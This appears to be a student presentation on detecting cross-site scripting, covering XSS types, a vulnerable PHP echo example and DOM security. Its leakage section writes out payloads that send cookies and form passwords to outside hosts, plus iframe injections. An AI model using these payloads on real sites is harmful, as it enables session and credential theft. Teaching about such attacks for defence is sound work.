
Cross-Site Scripting (XSS) attack detection for web applications

http://sourceforge.net/projects/xssalert7/

Author: Arjun Jain (07104701), Department of Computer Science and Information Technology, Jaypee Institute of Information Technology, Sector-62 Noida, Uttar Pradesh

Agenda

Overview of XSS attack
Types of XSS attack
Example
Limitations of the attack
DOM security overview
XSS alert working model
Demo

What is Cross-Site Scripting (XSS)


Cross-site scripting (XSS) is a type of computer security vulnerability, typically found in web applications, that enables malicious attackers to inject client-side script into web pages viewed by other users.

Types:
1: Reflected XSS
2: Stored XSS
3: DOM-based XSS

Ranked #1 in the OWASP 2007 Top 10
Ranked #2 in the OWASP 2010 Top 10

7 out of 10 sites have XSS (Jeremiah Grossman, WhiteHat Website Security Statistics Report, Oct 2007)

Reflected XSS
It detects all non-persistent XSS issues, which occur when a web application blindly echoes parts of the HTTP request into the corresponding HTTP response HTML.

Example:

<?php
$name = $_GET['name'];   // request parameter, fully attacker-controlled
echo "Hey " . $name;     // echoed unescaped into the response HTML
?>

$name may contain JavaScript.

Stored XSS
It refers to all XSS vulnerabilities where the adversary is able to permanently inject the malicious script into the vulnerable application's storage. The result is that every user who accesses the poisoned web page receives the injected script without further action by the adversary.

DOM-based XSS
It is a special variant of reflected XSS, where logic errors in legitimate JavaScript and careless usage of client-side data result in XSS.

Example

Unvalidated input with XSS (screenshot slides)

Unvalidated input resulted in a cross-site scripting attack and the theft of the administrator's cookies.

Types of information leakage


Client can reveal cookies to a 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgibin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to a 3rd party (userID/passwd, etc.):
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server:
www.trustedserver.com/xss.asp?name = <iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>

Client can be tricked into attacking other sites:
/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>

Limitations of these attacks

Usually only get one transaction with XSS code against the vulnerable site
Most attacks are only focused on collecting cookies
POST-based forms are seldom leveraged; attacks almost always use GET methods
Attacker does not know the actual responses to the client
Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks

DOM Security Overview

Child windows and same-site trust
Scripts can interact between the two windows
Script content can be loaded from anywhere (RPC/remote scripting is common)
Images can be loaded from anywhere
JavaScript can either be within <script></script> tags, loaded from elsewhere via <script src=remote.com>, or attached to many tags: <img src=javascript: onload=javascript:>
Form GET/POST can be to another site or a JavaScript action
XSS allows DOM abuse, but still follows DOM rules

XSS alert working model

Demo

Attack on a Yahoo server with the GET string ?q=

Final Result

Thank You !
